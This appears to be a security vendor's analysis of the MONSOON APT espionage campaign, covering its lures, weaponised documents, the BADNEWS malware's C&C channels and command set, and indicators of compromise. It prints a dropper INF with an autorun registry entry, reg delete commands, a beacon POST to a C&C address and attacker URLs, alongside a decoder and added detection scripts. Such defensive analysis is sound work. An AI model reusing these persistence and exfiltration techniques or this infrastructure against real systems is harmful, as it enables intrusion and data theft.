# MONSOON – ANALYSIS OF AN APT CAMPAIGN

### ESPIONAGE AND DATA LOSS UNDER THE COVER OF CURRENT AFFAIRS

**WRITTEN BY ANDY SETTLE, NICHOLAS GRIFFIN, ABEL TORO**

### Forcepoint™ Security Labs™ | Special Investigations

#### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 1/57

Figure 1 – Word-Cloud of Lure Document Titles

_“Our MONSOON investigation has uncovered what is clearly a concerted and persistent campaign to steal sensitive data from a variety of critical sources. The use of both current and topical themes [illustrated above] as lures, not only indicates the precision level of targeting but also the targeting decision process itself.”_

**_Andy Settle, Head of Special Investigations_**

## TABLE OF CONTENTS

- Executive Summary (p. 4)
  - Acknowledgements (p. 4)
- Summary of Observations (p. 5)
  - Key Features (p. 5): Adversary; Intent; Infrastructure; Capability; Victims; Victims of Interest; Victim of Opportunity; Timeframe
- Technical Analysis (p. 6)
  - Initial Discovery (p. 6): Pivoting via VirusTotal (p. 6); Cyber Crime Bill (p. 6); Pivoting by Author (p. 6); Distribution Mechanism (p. 9)
  - E-Mail Lures & Malware Distribution (p. 10): Email Lures (p. 10)
  - Topical News Lures (p. 12): News Site (p. 12); Google Plus (p. 13); Facebook (p. 14); Twitter Account (p. 15)
- Malware Analysis (p. 16)
  - Weaponised Documents (p. 16): Exploitation of Known Vulnerabilities (p. 16); BADNEWS Weaponised Documents (p. 17); AutoIt Backdoor & Unknown Logger Weaponised Documents (p. 19); TINYTYPHON Weaponised Documents (p. 19)
  - Potential Silverlight Exploit (p. 20): Silverlight Profiling (p. 21)
  - BADNEWS Malware (p. 22): DLL Side-Loading (p. 22); Persistence (p. 22); C&C Channels (p. 23); C&C Mechanism (p. 26); badnews_decoder.py (p. 27); Command Set (p. 28); Keylogger (p. 29); Document Crawler (p. 29); Window Message Processor (p. 29); Updater VBScript (p. 30)
  - AutoIt Backdoor (p. 30): Decompiled AutoIt Script (p. 31); Document Exfiltration (p. 31); Privilege Escalation (p. 31); PowerShell Second Stage & Metasploit Meterpreter (p. 32)
  - Unknown Logger Public V 1.5 (p. 37): Configuration (p. 40)
  - TINYTYPHON (p. 41): Configuration & Persistence (p. 41); Document Crawler (p. 42); Victims (p. 44)
- Attribution (p. 47): Victims (p. 47); Adversaries (p. 47); Cui Bono? (p. 47); Infrastructure (p. 48)
- Indicators of Compromise (p. 49): Lure URLs (p. 49); Weaponised Document Hashes (SHA1) (p. 49); BADNEWS Malware Hashes (SHA1) (p. 50); AutoIt Malware Hashes (SHA1) (p. 50); TINYTYPHON Malware Hashes (SHA1) (p. 50); Unknown Logger Malware Hashes (SHA1) (p. 50); Miscellaneous Samples (SHA1) (p. 50); BADNEWS C&C (p. 50); AutoIt C&C (p. 51); Meterpreter C&C (p. 51); TINYTYPHON C&C (p. 51); Names of Lure & Weaponised Files (p. 51)
- About Us (p. 55)
- Figures (p. 56)
- References (p. 57)

## EXECUTIVE SUMMARY

MONSOON is the name given to the Forcepoint Security Labs™ investigation into an ongoing espionage campaign that the Special Investigations team have been tracking and analysing since May 2016. The overarching campaign appears to target both Chinese nationals within different industries and government agencies in Southern Asia. It appears to have started in December 2015 and is still ongoing as of July 2016.

Amongst the evidence gathered during the MONSOON investigation were a number of indicators which make it highly probable (footnote 1) that this adversary and the OPERATION HANGOVER [1], [2] adversary are one and the same. These indicators include the use of the same infrastructure for the attacks, similar Tactics, Techniques and Procedures (TTPs), the targeting of demographically similar victims and operating geographically within the Indian Subcontinent.

_“More information is always better than less. When people know the reason things are happening, even if it's bad news, they can adjust their expectations and react accordingly. Keeping people in the dark only serves to stir negative emotions”._ Simon Sinek

The malware components used in MONSOON are typically distributed through weaponised documents sent through e-mail to specifically chosen targets. Themes of these documents are usually political in nature and taken from recent publications on topical current affairs. Several malware components have been used in this operation including Unknown Logger Public, TINYTYPHON, BADNEWS, and an AutoIt [3] backdoor. BADNEWS is particularly interesting, containing resilient command-and-control (C&C) capability using RSS feeds, Github, forums, blogs and Dynamic DNS hosts.

This whitepaper provides an in-depth understanding and insight into the actors and their campaign. It includes detailed analysis and findings, previously undocumented malware components, victims, and infrastructure involved.

#### ACKNOWLEDGEMENTS

We would like to acknowledge both Kaspersky and Cymmetria [4] who have published their own research on the groups referred to as "PATCHWORK" and "DROPPER ELEPHANT". We also recognise the analysis by Blue Coat in tracking OPERATION HANGOVER in the past [1]. We would like to thank the wider Forcepoint Security Labs team for their help with our investigation. We would also like to give special thanks to Ran Mosessco for assisting with specific analysis.

Footnote 1: SEE: “Uncertainty Yardstick”, Page 3-32 https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/311572/20110830_jdp2_00_ed3_with_change1.pdf

## SUMMARY OF OBSERVATIONS

#### KEY FEATURES

The campaign as observed, stage by stage:

| Stage | Phase | Observed elements |
|---|---|---|
| 1 | Recon | “Customer” provided target list? Thematic and regional recon themselves? |
| 2 | Lure | Targeted email; Google+; Facebook; Twitter; chinastrat[.com] |
| 3 | Redirect | N/A |
| 4 | Exploitation | Weaponized documents; Silverlight exploit; UAC bypass |
| 5 | Dropper | BADNEWS; TINYTYPHON; AutoIt Backdoor; Unknown Logger; Metasploit Meterpreter |
| 6 | Call Home | RSS; GitHub; Forums; News Articles; Dynamic DNS hosts |
| 7 | Data Loss | Sensitive Documents |

**Adversary.** Strong indication that this is conducted by the OPERATION HANGOVER group [1]. This group has been active since at least 2010 [2].

**Intent.** Data Exfiltration.

**Infrastructure.** Non-traditional resilient and obscure C&C. Including GitHub, forums, news items and RSS feeds.

**Capability.** BADNEWS and TINYTYPHON malware. Re-use of tool sets including: Metasploit, AutoIt Backdoor, MyDoom, Shellcode loading via Powershell, Unknown Logger. “PATCHWORK” [4]. CVE Exploitation. Current News Lures – Lures via email with tracking images. Over 172 lure documents, most referencing topical news items, relevant to the victims of interest. Most common lure document: 2016_China_Military_PowerReport.

**Victims.** Over 110 different victim countries and 6,300 victim IP addresses.

**Victims of Interest.** Government Agencies, Armed Forces, Embassies: Sri Lanka, Ceylon, South Korean,

**Victim of Opportunity.** Those with passing interest in Chinese military strategy being ‘snared’ by the lure web site. Majority in China (61% of all victims).

**Timeframe.** Between December 2015 to July 2016.

## TECHNICAL ANALYSIS

#### INITIAL DISCOVERY

**Pivoting via VirusTotal.** VirusTotal (footnote 2) (VT) Intelligence queries are often constructed in order to hunt for new, unusual and interesting malware as part of the routine work performed by the Special Investigations team. The initial discovery of MONSOON stemmed from one of these queries. During such activities, an RTF document was identified that warranted further investigation.

**Cyber Crime Bill.** A specific document was singled out for analysis via VT for a number of reasons. These included: a low detection rate, a low number of submissions, an interesting set of default languages including US English, Saudi Arabic and PRC Chinese, that it exploited a known vulnerability (CVE-2015-1641 [5]) and that it had filenames with political themes including “Microsoft Word - Telecommunications Policy - APPROVED.DOCX” and "Cyber_Crime_bill.doc" (footnote 3):

_PRELIMINARY_
_…_
_(1) This Act may be called the Prevention of Electronic Crimes Act, 2015._
_(2) It extends to the whole of Pakistan._
_(3) It shall apply to every citizen of Pakistan wherever he may be, and also to every other person for the time being in Pakistan._
_(4) It shall come into force at once._
_…_

Figure 2 – Cyber_Crime_Bill.doc (Excerpt)

Footnote 2: https://www.virustotal.com/
Footnote 3: https://www.virustotal.com/en/file/34cdfc67942060ba30c1b9ac1db9bd042f0f8e487b805b8a3e1935b4d2508db6/analysis/

This document was opened in a virtualised lab environment and was seen to “drop” malware. By analysing this malware it was possible to determine that it was not of a known or documented malware family. It contained interesting functionality that warranted further investigation (see below). This malware was named by Special Investigations as BADNEWS after its ability to use news sites and blogs to obtain its C&C address.

**Pivoting by Author.** By exploiting the document information found in the original malicious RTF, the name of the user who last modified the document was identified:

```
File Size                : 1407 kB
File Type                : RTF
File Type Extension      : rtf
MIME Type                : text/rtf
Title                    : Microsoft Word - Telecommunications Policy - APPROVED.DOCX
Author                   : mhjaved
Last Modified By         : ayyo
Create Date              : 2016:04:20 12:58:00
Modify Date              : 2016:04:20 12:58:00
Revision Number          : 2
Total Edit Time          : 0
Pages                    : 12
Words                    : 7076
Characters               : 40335
Company                  : Microsoft
Characters With Spaces   : 47317
Internal Version Number  : 32859
```

Figure 3 – EXIF info for Cyber_Crime_Bill.docx

Using another VT search, the following 6 documents matching this author information were found:

Figure 4 – Search VT by Author Metadata

The low number of results, similar file sizes and the same CVE exploitation gave a high level of certainty that these documents belong to the same actor.

The VT reports showed known names of some of these samples. One of the samples used genuine content from the National Institute for Defence Studies Japan document NIDS China Security Report 2016 (footnote 4). The specific filename used for this sample was _"china_report_EN_web_2016_A01.doc"_. Using Google to search for this specific filename returned three hits. Two of the results were for VT and another for a report on URLQuery.net. One of the VT results showed that the file was provided from a web server located on a host on IP address 37.58.60.195 and that it had also provided a number of other, similar files (footnote 5). The other VT result referred to the analysis of the malicious file (footnote 6).
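The author/last-modified-by pivot described above, as an added example (not code from the report): a small Python extractor for the RTF info group that recovers the Figure 3 fields and groups samples sharing the same Author and Last Modified By pair. The RTF skeleton and the sibling and unrelated samples are constructed; the field values copy Figure 3.

```python
import re
from collections import defaultdict

# Constructed RTF sample: the info-group values are those shown in Figure 3,
# the surrounding RTF skeleton is a minimal hand-written stand-in, not the real lure file.
CYBER_CRIME_BILL_RTF = (
    r"{\rtf1\ansi\deff0{\info"
    r"{\title Microsoft Word - Telecommunications Policy - APPROVED.DOCX}"
    r"{\author mhjaved}{\operator ayyo}"
    r"{\creatim\yr2016\mo4\dy20\hr12\min58}{\revtim\yr2016\mo4\dy20\hr12\min58}"
    r"{\version2}{\edmins0}{\nofpages12}{\nofwords7076}{\nofchars40335}"
    r"{\*\company Microsoft}{\nofcharsws47317}{\vern32859}}"
    r"\pard PRELIMINARY ...\par}"
)

# RTF 1.9 info-group control words mapped to the EXIF-style names used in Figure 3.
TEXT_FIELDS = {"title": "Title", "author": "Author", "operator": "Last Modified By",
               "company": "Company"}
INT_FIELDS = {"version": "Revision Number", "edmins": "Total Edit Time", "nofpages": "Pages",
              "nofwords": "Words", "nofchars": "Characters",
              "nofcharsws": "Characters With Spaces", "vern": "Internal Version Number"}
TIME_FIELDS = {"creatim": "Create Date", "revtim": "Modify Date"}


def info_group(rtf):
    """Return the contents of the RTF info group, tracking nested braces."""
    start = rtf.find(r"{\info")
    if start < 0:
        return ""
    depth = 0
    for i in range(start, len(rtf)):
        if rtf[i] == "{":
            depth += 1
        elif rtf[i] == "}":
            depth -= 1
            if depth == 0:
                return rtf[start + len(r"{\info"):i]
    return ""  # unterminated group: treat as absent


def rtf_metadata(rtf):
    """Extract document-property metadata from an RTF file's info group.
    Simplification: hex escapes and Unicode control words inside text values are not decoded."""
    info = info_group(rtf)
    meta = {}
    for word, name in TEXT_FIELDS.items():
        m = re.search(r"\{(?:\\\*)?\\" + word + r" ([^{}]*)\}", info)
        if m:
            meta[name] = m.group(1).strip()
    for word, name in INT_FIELDS.items():
        m = re.search(r"\{\\" + word + r"(\d+)\}", info)
        if m:
            meta[name] = int(m.group(1))
    for word, name in TIME_FIELDS.items():
        m = re.search(r"\{\\" + word + r"((?:\\[a-z]+\d+)+)\}", info)
        if m:
            p = {k: int(v) for k, v in re.findall(r"\\([a-z]+)(\d+)", m.group(1))}
            meta[name] = "%04d:%02d:%02d %02d:%02d:00" % (
                p.get("yr", 0), p.get("mo", 0), p.get("dy", 0), p.get("hr", 0), p.get("min", 0))
    return meta


def pivot_by_author(samples):
    """Group sample names by (Author, Last Modified By), the pivot used in the report.
    Only groups with more than one member are returned: candidate same-actor clusters."""
    groups = defaultdict(list)
    for name, rtf in samples.items():
        meta = rtf_metadata(rtf)
        key = (meta.get("Author"), meta.get("Last Modified By"))
        if key != (None, None):
            groups[key].append(name)
    return {k: sorted(v) for k, v in groups.items() if len(v) > 1}


# Constructed corpus: one sibling sharing the author pair and one unrelated file.
SAMPLES = {
    "Cyber_Crime_Bill.doc": CYBER_CRIME_BILL_RTF,
    "sibling_sample.rtf": r"{\rtf1{\info{\author mhjaved}{\operator ayyo}{\version2}}\pard x\par}",
    "unrelated.rtf": r"{\rtf1{\info{\author someone}{\operator else}}\pard y\par}",
}

if __name__ == "__main__":
    print(rtf_metadata(CYBER_CRIME_BILL_RTF))
    print(pivot_by_author(SAMPLES))
```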
Figure 5 – Lure Document Cover

| DATE | TIME | URL |
|---|---|---|
| 2016-05-31 | 18:51:31 | hxxp://www.cnmilit.com/index.php?f=China_Security_Report_CN2016.pps |
| 2016-05-10 | 00:56:37 | hxxp://cnmilit.com/index.php/?f=China_Security_Report_2016.pps |
| 2016-04-20 | 10:31:31 | hxxp://www.cnmilit.com/index.php?f=The_PLA_s_New_Organizational_Structure_Parts_1_and_2_01.doc |
| 2016-04-17 | 18:02:41 | hxxp://www.cnmilit.com/index.php?f=China_Security_Report_2016.pps |

Figure 6 – Lures from 37.58.60.195

Footnote 4: http://www.nids.go.jp/english/publication/chinareport/
Footnote 5: https://www.virustotal.com/en/ip-address/37.58.60.195/information/
Footnote 6: https://www.virustotal.com/en/file/ebd4f62bb85f6de1111cbd613d2d4288728732edda9eb427fe9f51bd1f2d6db2/analysis/

**Distribution Mechanism.** The final Google search result was a report generated by the URLQuery.net site:

Figure 7 – URLQuery.net

The site t.ymlp50[.com] is a legitimate web and e-mail marketing service. It is owned and operated by the Belgian company Your Mailing List Provider (YMLP). Further Google searches of other document names revealed similar redirection chains using the same service. Consequently, it is reasonable to conclude that a number of “weaponised” documents were delivered using YMLP.

#### E-MAIL LURES & MALWARE DISTRIBUTION

**Email Lures.** Using the information from the initial discoveries and correlating it against the ‘known bad’ data collected by Forcepoint’s Triton® AP-Email, it was possible to track down at least some of the targeted e-mail lures used by the HANGOVER group in the MONSOON campaign. The e-mail themes are typically current political events that may be of interest to the target recipient. It was possible to identify several Chinese politically themed e-mails linking to weaponised documents. A redacted example e-mail can be seen below.

Figure 8 – Known Bad Email Lure

The threat actor uses YMLP to fake the sender and embeds a link to a weaponised document in the e-mail body. Examples of a number of email details and embedded URLs can be seen in the table below.
| UTC Time | Subject | Sender | Embedded URL to Malicious Document |
|---|---|---|---|
| 6/29/2016 7:12 | The Chinese Statecraft, The China Syndrome and it's new legalism | mailreturn@smtp5.ymlpsrvr.net | hxxp://www.newsnstat[.com]/index.php?f=Report_Asia_Program_New_Geopolitics.pps |
| 6/28/2016 4:13 | China Plans a Breakaway Faction of the NSG | mailreturn@smtp6.ymlpsrvr.net | hxxp://www.newsnstat[.com]/index.php?f=Report_Asia_Program_New_Geopolitics.pps |
| 6/27/2016 5:08 | Stretching and Exploiting Thresholds for High Order War | mailreturn@smtp1.ymlpsrvr.net | hxxp://www.newsnstat[.com]/index.php?f=China_plan_to_dominate_South_China_Sea_and_beyond.doc |
| 6/24/2016 4:52 | 2016年成都中国电子展。 | mailreturn@smtp3.ymlpsrvr.net | hxxp://www.newsnstat[.com]/index.php?f=CEF_Chengdu_July_2016.pps |
| 5/20/2016 8:56 | Limits of Law in the South China Sea | mailreturn@smtp6.ymlpsrvr.net | hxxp://www.newsnstat[.com]/index.php?f=Limits_of_Law_in_the_South_China_Sea.pps |
| 5/9/2016 5:16 | China International Defence Electronics Exhibition (CIDEX) 2016 | mailreturn@smtp5.ymlpsrvr.net | hxxp://www.newsnstat[.com]/index.php?f=CIDEX2016.pps |
| 4/12/2016 4:56 | 中国安全战略报告2016 | mailreturn@smtp2.ymlpsrvr.net | hxxp://www.cnmilit[.com]/index.php?f=China_Security_Report_CN2016.pps |

Figure 9 – YMLP Lures

#### TOPICAL NEWS LURES

**News Site.** The attackers are also operating a fake political news site at chinastrat[.com]. The “downloads” section of this website contains similarly weaponised documents to the ones sent by email, and these documents drop the same malware families. It is reasonable to suggest that the login credentials of anybody who registers on the site are also harvested.

Figure 10 – China Strat Screen Shot

**Google Plus.** The actors have been operating a Google Plus account since December 2014. This account is used to post links to the actors’ fake news site.

Figure 11 – Lure Google+ Screen Shot

**Facebook.** The actors operate a Facebook account. This account is also used to post links to the actors’ fake news site.

Figure 12 – Lure Facebook Screen Shot

**Twitter Account.** The actors have operated a Twitter account since December 2014 and use it in a similar manner to their Google+ and Facebook accounts.
Figure 13 – Lure Twitter Screen Shot

## MALWARE ANALYSIS

#### WEAPONISED DOCUMENTS

**Exploitation of Known Vulnerabilities.** Several document types and document exploits have been used in the MONSOON campaign to deliver various malware components. It is reasonable to suggest that the actors are using a malicious document builder to quickly weaponise legitimate documents. The following vulnerabilities have been identified within the attackers' documents:

| Vulnerability | Description |
|---|---|
| CVE-2012-0158 | Microsoft BizTalk Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code |
| CVE-2014-6352 | Microsoft Windows CVE-2014-6352 OLE Package Manager Remote Code Execution Vulnerability |
| CVE-2015-1641 | Microsoft Office Memory Errors Let Remote Users Execute Arbitrary Code and Input Validation Flaw Permits Cross-Site Scripting Attacks |

Figure 14 – Exploited CVEs

**BADNEWS Weaponised Documents.** The BADNEWS malware is typically packaged into a malicious document via an encrypted binary blob within that document. This binary blob often contains a legitimate decoy document that is shown to the user. On other occasions the decoy document is downloaded directly. CVE-2015-1641 has been observed being exploited to drop BADNEWS.
When the document exploit is triggered, the shellcode drops the binary blob into the user's %temp% folder along with an encoded VBScript:

Figure 15 – Binary Blob Dropped to %temp%

The encoded VBScript uses a file extension that Windows does not, by default, associate with VBScript. The extensions .domx and .lgx have been observed. The shellcode adds a new file association for that extension so that such files are interpreted as encoded VBScript. Finally, the shellcode executes the encoded VBScript file, which extracts the encrypted files from the binary blob, shows the decoy document (if there is one), and executes the malware. The VBScript hard-codes the sizes of the files to extract from the binary blob:

Figure 16 – VB Extract of Blob

The decryption routine uses the encryption key "ludos” (footnote 7) to decrypt 32-byte chunks of the embedded files:

Figure 17 – VB Decryption of Embedded Files

Our analysis of BADNEWS can be found later in this document [Page: 22].

Footnote 7: http://starwars.wikia.com/wiki/Ludos

**AutoIt Backdoor & Unknown Logger Weaponised Documents.** The majority of weaponised documents drop an AutoIt backdoor. Documents exploiting CVE-2014-6352 have been observed installing the malware via the following INF:

```
[Version]
Signature = "$CHICAGO$"
class=61883
ClasGuid={2E87RBCD-7488-12T1-QYXX-74521ACV1AS4}
DriverVer=0/21/2006,61.7600.16385

[DestinationDirs]
DefaultDestDir = 1

[DefaultInstall]
AddReg = RxStart

[RxStart]
HKLM,Software\Microsoft\Windows\CurrentVersion\RunOnce,Install,,%1%\sysvolinfo.exe
```

The malware executable name varies.
The following are some of the names we have observed:

- sysvolinfo.exe
- svchost.exe
- rar.exe
- 360configuration_patch_update_2016v4.exe

The AutoIt script is always roughly the same, but some versions contain less functionality. A full analysis of the AutoIt backdoor can be found later in this document [Page: 30].

Malware known as Unknown Logger has also been dropped by the same sort of weaponised document. A full analysis of Unknown Logger can also be found later in this document [Page: 37].

**TINYTYPHON Weaponised Documents.** A third malware used in MONSOON is a small backdoor based on publicly available code from the MyDoom [6] worm. This malware crawls mapped drives for documents and uploads them to its C&C. We have seen this dropped by an RTF exploiting CVE-2012-0158 under the name "DPP_INDIA_2016.doc" (footnote 8). The document contains shellcode which drops a file under %temp%\svchost.exe and then attempts to disable Word's recovery features via the following commands:

```
cmd.exe /c reg delete "HKCU\Software\Microsoft\Office\14.0\Word\Resiliency" /F
cmd.exe /c reg delete "HKCU\Software\Microsoft\Office\12.0\Word\Resiliency" /F
```

The svchost.exe (footnote 9) dropped by the document executes an embedded, base64 encoded malware component that we have named "TINYTYPHON". Our analysis of this malware can be found later in this document [Page: 41].

Footnote 8: http://starwars.wikia.com/wiki/Ludos
Footnote 9: SHA1: 411387df2145039fc601bf38192b721388cc5141

#### POTENTIAL SILVERLIGHT EXPLOIT

The weaponised document sites such as cnmilit[.com] and newsnstat[.com] attempt to redirect the user to lite.php after 10 seconds:

Figure 18 – PHP Redirect

It was not possible to access cnmilit[.com] as of May 27, 2016. It was therefore not possible to analyse the pages served. However, it was possible to browse to lite.php on newsnstat[.com].
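As an added example (not the report's own tooling), the following Python parses an INF like the one shown for the CVE-2014-6352 documents and flags AddReg entries that write under an autorun key, the persistence step those droppers rely on. The INF text is a constructed copy of the listing above; the parser also follows AddReg references from any other *Install section.

```python
import re

# Constructed copy of the dropper INF shown in the report (values as printed there).
SYSVOLINFO_INF = """[Version]
Signature = "$CHICAGO$"
class=61883
ClasGuid={2E87RBCD-7488-12T1-QYXX-74521ACV1AS4}
DriverVer=0/21/2006,61.7600.16385

[DestinationDirs]
DefaultDestDir = 1

[DefaultInstall]
AddReg = RxStart

[RxStart]
HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,%1%\\sysvolinfo.exe
"""

# Registry subkeys whose values are executed at logon (matched at the end of the subkey path).
AUTORUN_KEYS = re.compile(
    r"\\CurrentVersion\\(Run|RunOnce|RunServices|RunServicesOnce)$", re.IGNORECASE)


def parse_inf(text):
    """Parse INF text into {section_name_lower: [non-empty lines]}; ';' comments are stripped."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def addreg_targets(sections):
    """Return the section names referenced by AddReg directives in every install section
    (DefaultInstall, DefaultInstall.NT, vendor-named *Install sections, ...)."""
    targets = []
    for name, lines in sections.items():
        if "install" not in name:
            continue
        for line in lines:
            key, _, value = line.partition("=")
            if key.strip().lower() == "addreg":
                targets.extend(v.strip().lower() for v in value.split(",") if v.strip())
    return targets


def find_autorun_writes(text):
    """Flag AddReg entries of the form root,subkey,[value-name],[flags],[data]
    whose subkey is an autorun key. Returns one dict per hit."""
    sections = parse_inf(text)
    hits = []
    for target in addreg_targets(sections):
        for line in sections.get(target, []):
            parts = [p.strip() for p in line.split(",")]
            if len(parts) < 2:
                continue
            subkey = parts[1]
            if AUTORUN_KEYS.search("\\" + subkey):
                hits.append({"root": parts[0].upper(), "subkey": subkey,
                             "value_name": parts[2] if len(parts) > 2 else "",
                             "data": parts[4] if len(parts) > 4 else ""})
    return hits


if __name__ == "__main__":
    for hit in find_autorun_writes(SYSVOLINFO_INF):
        print("autorun write: %(root)s\\%(subkey)s -> %(data)s" % hit)
```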
The content of this page remained the same over the duration of the investigation.

**Silverlight Profiling.** The code profiles whether a system has Microsoft Silverlight installed. The site then requests lite.php?name= where the value of name is 'true' or 'false' depending on whether Silverlight is installed and accessible or not. No further content was served from lite.php during the investigation.

A likely scenario is that the attackers wanted to use a Silverlight exploit to execute the malware in the case of a user who does not open, or is not successfully exploited by, the weaponised document. This could have been intended as an exploitation of something like CVE-2016-0034, which is known to have been adopted by exploit kits in February 2016 and which pre-dates MONSOON.

```
HTTP/1.1 200 OK
Date: Fri, 27 May 2016 22:32:29 GMT
Server: Apache
X-Powered-By: PHP/5.5.12
Content-Length: 749
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
```

Figure 19 – Silverlight Profiling

#### BADNEWS MALWARE

The BADNEWS malware is capable of arbitrary command execution, screenshots, self-updating, downloading and executing files, and directory listings. The name was given due to its use of RSS feeds, forums, blogs and Dynamic DNS providers for its C&C infrastructure. BADNEWS uses a DLL side-loading technique with a signed Java binary in order to evade security solutions. It is a first stage malware that is likely to receive second stage malware components if the target is of interest, although we did not observe this behaviour.

**DLL Side-Loading.** The BADNEWS DLL is typically side-loaded into a legitimate signed Java executable. A specific weaponised document analysed[10] drops a binary blob and an encoded VBScript file which then extracts a decoy document along with the following 3 files:

- MicroScMgmt.exe
- msvcr71.dll
- jli.dll

_MicroScMgmt.exe_ is a renamed version of the legitimate Java Runtime 6.0.390.4 binary named java_rmi.exe and is signed by Sun Microsystems. This application requires the legitimate msvcr71.dll and also requires a DLL named jli.dll. However, the jli.dll here contains the BADNEWS malware. When MicroScMgmt.exe is executed, it will load the malicious jli.dll and ultimately call the JLI_WildcardExpandClasspath_0 export in the DLL. At this point the BADNEWS code takes over and begins performing its malicious routines. This technique is a stealth tactic to evade anti-malware solutions, which are notoriously weak at detecting side-loaded malware.

The malware will spawn 2 threads, one to perform key-logging and one to crawl the local hard-drives for document files.

**Persistence.** BADNEWS installs a registry key under _HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run_ in order to remain persistent on the system.

Figure 20 – Windows Registry Keys

10 SHA1: 11064dcef86ac1d94c170b24215854efb8aad542

**C&C Channels.** BADNEWS is typically built with several hard-coded channels which it can use to obtain commands or change its C&C. These C&C channels include RSS feeds, GitHub, forums, blogs and Dynamic DNS hosts.
In the sample analysed, the malware had several hard-coded C&C channels, although some were corrupted and did not work correctly:

```
hxxp://feeds.rapidfeeds.com/81913/
hxxps://raw.githubusercontent.com/azeemkhan89/cartoon/master/cart.xml
hxxp://www.webrss.com/createfeed.phpfeedid=47448
hxxp://www.webrss.com/createfeed.phpfeedid=47449
hxxp://www.chinasmack.com/2016/digest/chinese-tourist-bit-by-snake-in-thailand.html
hxxp://www.travelhoneymoon.wordpress.com/2016/03/30/tips-to-how-to-feel-happy
hxxp://overthemontains.weebly.com/trekking-lovers
hxxp://tariqj.crabdance.com/tesla/ghsnls.php
hxxp://javedtar.chickenkiller.com/tesla/ghsnls.php
hxxp://asatar.ignorelist.com/tesla/ghsnls.php
```

The first 7 C&Cs are referred to by the malware as either a "blog" or a "feed". These channels are only used to tell the malware where its real C&C is. The last 3 Dynamic DNS channels are back-up C&Cs in case it is not able to obtain a C&C address from one of the blogs or feeds.

The Dynamic DNS back-up C&Cs typically use the same "ghsnls.php" filename, but the directory name changes for different builds of the malware. The directory may indicate a campaign identifier or a codeword for the target victim of the malware. We have seen the following directories used:

- tesla
- Tussmal
- Mussmal
- quantum
- yumhong

When a C&C is obtained from a blog or feed, it is extracted from the page by searching for "{{" in the content.
A GitHub example[11] is below:

Figure 21 – GitHub Command Channel

Another example, taken from a comment by a user called "Zubaid"[12] posted on chinasmack[.com]:

Figure 22 – Chinasmack[.com] Command Channel

11 https://github.com/azeemkhan89/
12 https://en.wikipedia.org/wiki/Zubaid

And a final example taken from forum.china.org.cn:

Figure 23 – Forum Command Channel

The content after "{{" is the C&C address, which is encrypted in the same manner as described below. Of note is that this text on the forum page is invisible, as the author has set it to white text on a white background.

**C&C Mechanism.** Once BADNEWS has decided which C&C address to communicate with, it will send off some system information and await a command to execute. A unique identifier is computed for the victim, based on the tick count of the victim machine when the malware was executed. This ID is saved in the file "%temp%\T89.dat".

```
POST http://85.25.79.230/tesla/ghsnls.php HTTP/1.1
Accept: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
User-Agent: UserAgent:Mozilla/5.0(Windows NT 6.1;WOW64)AppleWebKit/537.1(KHTML,like Gecko)Chrome/21.0.1180.75Safari/537.1
Host: 85.25.79.230
Content-Length: 249
Cache-Control: no-cache

esmqss=**redacted**&btcbumegy=**redacted**&pxckhj=**redacted**&xyvqq=**redacted**
```

The encryption mechanism used for all C&C data is done by taking each byte and performing a ROR by 3 bits and then an XOR by 0x23.
The result of this is then converted into a hexadecimal representation of the bytes, and finally encoded into base64. Below is a Python script written to decrypt the data:

**badnews_decoder.py**

```
import sys
import base64

# Rotate left: 0b1001 --> 0b0011
rol = lambda val, r_bits, max_bits: \
    (val << r_bits % max_bits) & (2**max_bits - 1) | \
    ((val & (2**max_bits - 1)) >> (max_bits - (r_bits % max_bits)))

# Rotate right: 0b1001 --> 0b1100
ror = lambda val, r_bits, max_bits: \
    ((val & (2**max_bits - 1)) >> r_bits % max_bits) | \
    (val << (max_bits - (r_bits % max_bits)) & (2**max_bits - 1))

if len(sys.argv) != 2:
    exit("Usage: badnews_decoder.py <base64_data>")

data = sys.argv[1]

# Print original data input
print("[1] Original: " + data)

# Base64 decode; the result is the hex-text representation of the encrypted bytes
data = base64.b64decode(data).decode("ascii")

# Print the base64 decoded hex byte string
print("[2] Base64 dec: " + data)

# Decode the hex bytes into binary data
data = bytes.fromhex(data)
decdata = ""

# XOR each byte by 0x23 and rotate left by 3 bits (the inverse of ROR 3 then XOR 0x23)
for c in data:
    c ^= 0x23
    c = rol(c, 3, 8)
    decdata += chr(c)

# Null terminate
decdata += "\x00"

# Print the final decrypted data
print("[3] Decrypted: " + decdata)
```

An example of the input and output for this script:

```
>badnews_decoder.py MmVhZGFkMmQ2NGM2YzY4NWU2NjU4NWE1ZTYwNDI0ZTZlNTI0YzY4ZWFkNmMyZGVlNGZjZGM2Y2YwZmFkOGZlNjJkMmUyZDIz==
[1] Original: MmVhZGFkMmQ2NGM2YzY4NWU2NjU4NWE1ZTYwNDI0ZTZlNTI0YzY4ZWFkNmMyZGVlNGZjZGM2Y2YwZmFkOGZlNjJkMmUyZDIz==
[2] Base64 dec: 2eadad2d64c6c685e66585a5e60424e6e524c68ead6c2dee4fcdc6cf0fad8fe62d2e2d23
[3] Decrypted: http://5.254.98.68/mtzpncw/gate.php
```

**Command Set.** After BADNEWS sends off the system information of the machine, it will receive back a command. Most commands are in the format "tag:parameter", where "tag" is a plaintext command tag and "parameter" is a parameter for the command, encrypted with the algorithm previously described.
Listed below are the supported command tags and their descriptions:

|CMD|Description|
|---|---|
|shell|Download an EXE and inject it into a new process using process hollowing|
|link|Download an EXE and execute it via the CreateProcess API|
|mod|Download a DLL from the URL specified and load it into the current process|
|upd|Download a new version of the malware and delete the old one via VBScript (see below)|
|dwd|Create an empty file in the %temp% folder and send it to the C&C - possibly used for identifying the local system time|
|kl|Send the keylog file to the C&C (keylogging is always on)|
|snp|Take a screenshot and send it to the C&C|
|ustr|Exfiltrate documents found on the machine - the malware asynchronously crawls local hard-drives for documents (pdf, doc etc.)|
|sdwl|Upload the specified file from the victim machine|
|utop|Disable document exfiltration|
